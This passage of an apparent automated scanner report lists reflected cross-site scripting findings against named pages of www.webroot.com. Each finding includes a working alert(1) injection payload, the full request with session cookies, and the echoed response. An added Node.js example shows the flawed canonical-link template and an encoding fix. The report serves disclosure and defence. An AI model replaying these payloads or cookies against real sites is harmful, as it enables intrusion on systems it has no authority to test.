User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1303045247220; WRSID=53806c0679aadc2e5c9ced35171f7aa7; __utmz=43535610.1303044931.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; RCID=P_RC%3D%3E99999%3AP_AC%3D%3E%3AP_RSC%3D%3E; mbox=session#1303044923199-20205#1303047100|PC#1303044923199-20205.17#1318856440|check#true#1303045300; s_vnum=1305636930736%26vn%3D1; s_invisit=true; s_cc=true; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1303045247_PCT-1303045247_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; s_vi=[CS]v1|26D571A185013486-400001026021711E[CE]; s_nr=1303045247207; __utma=43535610.2084358374.1303044931.1303044931.1303044931.1; __utmc=43535610; __utmb=43535610.2.10.1303044931;

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 13:11:47 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 28779

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">

<he
...[SNIP]...
type="text/javascript">
$(function() {    
/* jquery should be wrapped in document ready function */                        
               
$("#resourcesLinks ul li a[href='/En_US/business-events-and-webinars-archives.html?19b23"-alert(1)-"08b2f515f3=1']").css("font-weight", "bold");
});
</script>
...[SNIP]...

4.204. http://www.webroot.com/En_US/business-products.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.webroot.com
Path:   /En_US/business-products.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e87a2"-alert(1)-"225e28addd9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /En_US/business-products.html?e87a2"-alert(1)-"225e28addd9=1 HTTP/1.1
Host: www.webroot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1303045247220; WRSID=53806c0679aadc2e5c9ced35171f7aa7; __utmz=43535610.1303044931.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; RCID=P_RC%3D%3E99999%3AP_AC%3D%3E%3AP_RSC%3D%3E; mbox=session#1303044923199-20205#1303047100|PC#1303044923199-20205.17#1318856440|check#true#1303045300; s_vnum=1305636930736%26vn%3D1; s_invisit=true; s_cc=true; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1303045247_PCT-1303045247_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; s_vi=[CS]v1|26D571A185013486-400001026021711E[CE]; s_nr=1303045247207; __utma=43535610.2084358374.1303044931.1303044931.1303044931.1; __utmc=43535610; __utmb=43535610.2.10.1303044931;

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 13:11:42 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 29700

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">

<he
...[SNIP]...
<script type="text/javascript">
   //bold which ever page this is
   $("#rightRailLinks ul li a[href='/En_US/business-products.html?e87a2"-alert(1)-"225e28addd9=1']").css("font-weight", "bold");
</script>
...[SNIP]...

4.205. http://www.webroot.com/En_US/business-security-resources-customer-case-studies.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.webroot.com
Path:   /En_US/business-security-resources-customer-case-studies.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2e445"-alert(1)-"2963631dfae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /En_US/business-security-resources-customer-case-studies.html?2e445"-alert(1)-"2963631dfae=1 HTTP/1.1
Host: www.webroot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1303045247220; WRSID=53806c0679aadc2e5c9ced35171f7aa7; __utmz=43535610.1303044931.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; RCID=P_RC%3D%3E99999%3AP_AC%3D%3E%3AP_RSC%3D%3E; mbox=session#1303044923199-20205#1303047100|PC#1303044923199-20205.17#1318856440|check#true#1303045300; s_vnum=1305636930736%26vn%3D1; s_invisit=true; s_cc=true; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1303045247_PCT-1303045247_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; s_vi=[CS]v1|26D571A185013486-400001026021711E[CE]; s_nr=1303045247207; __utma=43535610.2084358374.1303044931.1303044931.1303044931.1; __utmc=43535610; __utmb=43535610.2.10.1303044931;

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 13:11:49 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 73281

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">

<he
...[SNIP]...
javascript">
$(function() {    
/* jquery should be wrapped in document ready function */                        
               
$("#resourcesLinks ul li a[href='/En_US/business-security-resources-customer-case-studies.html?2e445"-alert(1)-"2963631dfae=1']").css("font-weight", "bold");
});
</script>
...[SNIP]...

4.206. http://www.webroot.com/En_US/business-security-resources-white-papers-and-reports.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.webroot.com
Path:   /En_US/business-security-resources-white-papers-and-reports.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 15427"-alert(1)-"54c3f4aa5d3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /En_US/business-security-resources-white-papers-and-reports.html?15427"-alert(1)-"54c3f4aa5d3=1 HTTP/1.1
Host: www.webroot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1303045247220; WRSID=53806c0679aadc2e5c9ced35171f7aa7; __utmz=43535610.1303044931.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; RCID=P_RC%3D%3E99999%3AP_AC%3D%3E%3AP_RSC%3D%3E; mbox=session#1303044923199-20205#1303047100|PC#1303044923199-20205.17#1318856440|check#true#1303045300; s_vnum=1305636930736%26vn%3D1; s_invisit=true; s_cc=true; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1303045247_PCT-1303045247_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; s_vi=[CS]v1|26D571A185013486-400001026021711E[CE]; s_nr=1303045247207; __utma=43535610.2084358374.1303044931.1303044931.1303044931.1; __utmc=43535610; __utmb=43535610.2.10.1303044931;

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 13:11:44 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 33401

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">

<he
...[SNIP]...
ascript">
$(function() {    
/* jquery should be wrapped in document ready function */                        
               
$("#resourcesLinks ul li a[href='/En_US/business-security-resources-white-papers-and-reports.html?15427"-alert(1)-"54c3f4aa5d3=1']").css("font-weight", "bold");
});
</script>
...[SNIP]...

4.207. http://www.webroot.com/En_US/case-study/email-security-chula-vista.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.webroot.com
Path:   /En_US/case-study/email-security-chula-vista.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8cd53"><script>alert(1)</script>c11a0418132 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /En_US/case-study/email-security-chula-vista.html?8cd53"><script>alert(1)</script>c11a0418132=1 HTTP/1.1
Host: www.webroot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1303045247220; WRSID=53806c0679aadc2e5c9ced35171f7aa7; __utmz=43535610.1303044931.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; RCID=P_RC%3D%3E99999%3AP_AC%3D%3E%3AP_RSC%3D%3E; mbox=session#1303044923199-20205#1303047100|PC#1303044923199-20205.17#1318856440|check#true#1303045300; s_vnum=1305636930736%26vn%3D1; s_invisit=true; s_cc=true; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1303045247_PCT-1303045247_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; s_vi=[CS]v1|26D571A185013486-400001026021711E[CE]; s_nr=1303045247207; __utma=43535610.2084358374.1303044931.1303044931.1303044931.1; __utmc=43535610; __utmb=43535610.2.10.1303044931;

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 13:11:51 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 21232


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">


<
...[SNIP]...
<link rel="canonical" href="http:///En_US/case-study/email-security-chula-vista.html?8cd53"><script>alert(1)</script>c11a0418132=1" />
...[SNIP]...
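Added example, not code from the XSS.CX report or from webroot.com: a Node.js model of the `<link rel="canonical">` line in the response above, where the raw request URI, query string included, is placed inside a double-quoted `href` attribute, next to a hardened builder. The origin string, template and function names are assumptions made for the example; the payload URI is the one from this finding.

```javascript
// Added example: not code from the XSS.CX report or from webroot.com.
// Models the <link rel="canonical"> line in the response above, where the raw request URI,
// query string included, lands inside a double-quoted href attribute. The origin string,
// template and function names are constructed for illustration.

// Encoder for a value placed inside a double-quoted HTML attribute.
function encodeHtmlAttr(s) {
  return String(s).replace(/&/g, '&amp;').replace(/"/g, '&quot;').replace(/'/g, '&#x27;')
    .replace(/</g, '&lt;').replace(/>/g, '&gt;');
}

// Vulnerable: origin + raw URI concatenated into the attribute; a '">' in the URI ends
// both the attribute value and the tag, and whatever follows is parsed as markup.
function canonicalVulnerable(origin, requestUri) {
  return '<link rel="canonical" href="' + origin + requestUri + '" />';
}

// Hardened in two layers: (1) a canonical URL names the resource, so the query string and
// fragment are dropped rather than echoed; (2) the remainder is attribute-encoded anyway,
// so a value that reaches this point can never close the quotes.
function canonicalSafe(origin, requestUri) {
  const path = requestUri.split('#')[0].split('?')[0];
  return '<link rel="canonical" href="' + encodeHtmlAttr(origin + path) + '" />';
}

// Heuristic tag counter used to show the breakout: counts '<' that occur outside quoted
// attribute values. A correctly built <link> yields exactly 1.
function countTags(html) {
  let count = 0;
  let quote = null;
  for (const ch of html) {
    if (quote) { if (ch === quote) quote = null; continue; }
    if (ch === '"' || ch === "'") { quote = ch; continue; }
    if (ch === '<') count += 1;
  }
  return count;
}

// Origin is assumed; the captured response actually emits an empty authority ("http:///").
const origin = 'https://example.invalid';
const payloadUri =
  '/En_US/case-study/email-security-chula-vista.html?8cd53"><script>alert(1)</script>c11a0418132=1';

const vulnerableTag = canonicalVulnerable(origin, payloadUri);
const safeTag = canonicalSafe(origin, payloadUri);

console.log(vulnerableTag, '-> tags:', countTags(vulnerableTag)); // 3
console.log(safeTag, '-> tags:', countTags(safeTag));             // 1
```

Dropping the query string is the primary fix here: a canonical link that carries whatever query string the visitor arrived with is wrong for its stated purpose as well as unsafe, and the findings for the sibling case-study pages (4.209 and 4.212) are the same template behaving the same way. The attribute encoder is the second layer, for any value that still has to be written into an attribute. Separately, the captured response writes `href="http:///En_US/..."` with an empty host, so the tag as served does not point at the site even before the injection.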

4.208. http://www.webroot.com/En_US/case-study/email-security-chula-vista.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.webroot.com
Path:   /En_US/case-study/email-security-chula-vista.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7a80b"-alert(1)-"ca44564b1f9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /En_US/case-study/email-security-chula-vista.html?7a80b"-alert(1)-"ca44564b1f9=1 HTTP/1.1
Host: www.webroot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1303045247220; WRSID=53806c0679aadc2e5c9ced35171f7aa7; __utmz=43535610.1303044931.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; RCID=P_RC%3D%3E99999%3AP_AC%3D%3E%3AP_RSC%3D%3E; mbox=session#1303044923199-20205#1303047100|PC#1303044923199-20205.17#1318856440|check#true#1303045300; s_vnum=1305636930736%26vn%3D1; s_invisit=true; s_cc=true; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1303045247_PCT-1303045247_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; s_vi=[CS]v1|26D571A185013486-400001026021711E[CE]; s_nr=1303045247207; __utma=43535610.2084358374.1303044931.1303044931.1303044931.1; __utmc=43535610; __utmb=43535610.2.10.1303044931;

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 13:11:52 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 21202


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">


<
...[SNIP]...
type="text/javascript">
$(function() {    
/* jquery should be wrapped in document ready function */                        
               
$("#resourcesLinks ul li a[href='/En_US/case-study/email-security-chula-vista.html?7a80b"-alert(1)-"ca44564b1f9=1']").css("font-weight", "bold");
});
</script>
...[SNIP]...

4.209. http://www.webroot.com/En_US/case-study/internet-security-for-students.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.webroot.com
Path:   /En_US/case-study/internet-security-for-students.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83e69"><script>alert(1)</script>d61538cc7e6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /En_US/case-study/internet-security-for-students.html?83e69"><script>alert(1)</script>d61538cc7e6=1 HTTP/1.1
Host: www.webroot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1303045247220; WRSID=53806c0679aadc2e5c9ced35171f7aa7; __utmz=43535610.1303044931.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; RCID=P_RC%3D%3E99999%3AP_AC%3D%3E%3AP_RSC%3D%3E; mbox=session#1303044923199-20205#1303047100|PC#1303044923199-20205.17#1318856440|check#true#1303045300; s_vnum=1305636930736%26vn%3D1; s_invisit=true; s_cc=true; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1303045247_PCT-1303045247_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; s_vi=[CS]v1|26D571A185013486-400001026021711E[CE]; s_nr=1303045247207; __utma=43535610.2084358374.1303044931.1303044931.1303044931.1; __utmc=43535610; __utmb=43535610.2.10.1303044931;

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 13:12:02 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 22489


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">


<
...[SNIP]...
<link rel="canonical" href="http:///En_US/case-study/internet-security-for-students.html?83e69"><script>alert(1)</script>d61538cc7e6=1" />
...[SNIP]...

4.210. http://www.webroot.com/En_US/case-study/internet-security-for-students.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.webroot.com
Path:   /En_US/case-study/internet-security-for-students.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1f856"-alert(1)-"f99e19d405c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /En_US/case-study/internet-security-for-students.html?1f856"-alert(1)-"f99e19d405c=1 HTTP/1.1
Host: www.webroot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1303045247220; WRSID=53806c0679aadc2e5c9ced35171f7aa7; __utmz=43535610.1303044931.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; RCID=P_RC%3D%3E99999%3AP_AC%3D%3E%3AP_RSC%3D%3E; mbox=session#1303044923199-20205#1303047100|PC#1303044923199-20205.17#1318856440|check#true#1303045300; s_vnum=1305636930736%26vn%3D1; s_invisit=true; s_cc=true; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1303045247_PCT-1303045247_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; s_vi=[CS]v1|26D571A185013486-400001026021711E[CE]; s_nr=1303045247207; __utma=43535610.2084358374.1303044931.1303044931.1303044931.1; __utmc=43535610; __utmb=43535610.2.10.1303044931;

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 13:12:03 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 22459


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">


<
...[SNIP]...
e="text/javascript">
$(function() {    
/* jquery should be wrapped in document ready function */                        
               
$("#resourcesLinks ul li a[href='/En_US/case-study/internet-security-for-students.html?1f856"-alert(1)-"f99e19d405c=1']").css("font-weight", "bold");
});
</script>
...[SNIP]...

4.211. http://www.webroot.com/En_US/case-study/internet-security-in-australia.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.webroot.com
Path:   /En_US/case-study/internet-security-in-australia.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2b420"-alert(1)-"5b7e7f6458a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /En_US/case-study/internet-security-in-australia.html?2b420"-alert(1)-"5b7e7f6458a=1 HTTP/1.1
Host: www.webroot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1303045247220; WRSID=53806c0679aadc2e5c9ced35171f7aa7; __utmz=43535610.1303044931.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; RCID=P_RC%3D%3E99999%3AP_AC%3D%3E%3AP_RSC%3D%3E; mbox=session#1303044923199-20205#1303047100|PC#1303044923199-20205.17#1318856440|check#true#1303045300; s_vnum=1305636930736%26vn%3D1; s_invisit=true; s_cc=true; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1303045247_PCT-1303045247_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; s_vi=[CS]v1|26D571A185013486-400001026021711E[CE]; s_nr=1303045247207; __utma=43535610.2084358374.1303044931.1303044931.1303044931.1; __utmc=43535610; __utmb=43535610.2.10.1303044931;

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 13:12:03 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 21713


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">


<
...[SNIP]...
e="text/javascript">
$(function() {    
/* jquery should be wrapped in document ready function */                        
               
$("#resourcesLinks ul li a[href='/En_US/case-study/internet-security-in-australia.html?2b420"-alert(1)-"5b7e7f6458a=1']").css("font-weight", "bold");
});
</script>
...[SNIP]...

4.212. http://www.webroot.com/En_US/case-study/internet-security-in-australia.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.webroot.com
Path:   /En_US/case-study/internet-security-in-australia.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40c43"><script>alert(1)</script>e7b38b78623 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /En_US/case-study/internet-security-in-australia.html?40c43"><script>alert(1)</script>e7b38b78623=1 HTTP/1.1
Host: www.webroot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1303045247220; WRSID=53806c0679aadc2e5c9ced35171f7aa7; __utmz=43535610.1303044931.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; RCID=P_RC%3D%3E99999%3AP_AC%3D%3E%3AP_RSC%3D%3E; mbox=session#1303044923199-20205#1303047100|PC#1303044923199-20205.17#1318856440|check#true#1303045300; s_vnum=1305636930736%26vn%3D1; s_invisit=true; s_cc=true; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1303045247_PCT-1303045247_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; s_vi=[CS]v1|26D571A185013486-400001026021711E[CE]; s_nr=1303045247207; __utma=43535610.2084358374.1303044931.1303044931.1303044931.1; __utmc=43535610; __utmb=43535610.2.10.1303044931;

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 13:12:01 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 21742


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">


<
...[SNIP]...
<link rel="canonical" href="http:///En_US/case-study/internet-security-in-australia.html?40c43"><script>alert(1)</script>e7b38b78623=1" />
...[SNIP]...

4.213. http://www.webroot.com/En_US/case-study/saas-technology-cloud-computing.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.webroot.com
Path:   /En_US/case-study/saas-technology-cloud-computing.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c3b3"><script>alert(1)</script>4078136ea2c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /En_US/case-study/saas-technology-cloud-computing.html?8c3b3"><script>alert(1)</script>4078136ea2c=1 HTTP/1.1
Host: www.webroot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1303045247220; WRSID=53806c0679aadc2e5c9ced35171f7aa7; __utmz=43535610.1303044931.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; RCID=P_RC%3D%3E99999%3AP_AC%3D%3E%3AP_RSC%3D%3E; mbox=session#1303044923199-20205#1303047100|PC#1303044923199-20205.17#1318856440|check#true#1303045300; s_vnum=1305636930736%26vn%3D1; s_invisit=true; s_cc=true; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1303045247_PCT-1303045247_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; s_vi=[CS]v1|26D571A185013486-400001026021711E[CE]; s_nr=1303045247207; __utma=43535610.2084358374.1303044931.1303044931.1303044931.1; __utmc=43535610; __utmb=43535610.2.10.1303044931;

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 13:12:02 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 22170


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">


<
...[SNIP]...
<link rel="canonical" href="http:///En_US/case-study/saas-technology-cloud-computing.html?8c3b3"><script>alert(1)</script>4078136ea2c=1" />
...[SNIP]...

4.214. http://www.webroot.com/En_US/case-study/saas-technology-cloud-computing.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.webroot.com
Path:   /En_US/case-study/saas-technology-cloud-computing.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7bafe"-alert(1)-"9761630f095 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /En_US/case-study/saas-technology-cloud-computing.html?7bafe"-alert(1)-"9761630f095=1 HTTP/1.1
Host: www.webroot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
